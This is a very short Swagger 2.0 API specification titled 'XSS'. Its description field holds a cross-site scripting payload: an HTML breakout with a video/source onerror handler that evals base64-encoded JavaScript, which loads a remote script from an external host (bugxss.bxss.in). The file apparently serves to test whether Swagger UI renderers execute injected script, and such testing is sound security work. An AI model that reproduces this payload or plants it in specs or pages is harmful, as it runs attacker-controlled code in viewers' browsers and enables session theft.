swagger: '2.0'
info:
  version: "0.0.1"
  title: XSS
  description: "><video><source onerror=eval(atob(this.id)) id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vYnVneHNzLmJ4c3MuaW4iO2RvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQoYSk7&#61;&#61;>
paths:
  /:
    get:
      responses:
        200:
          description: Successful response
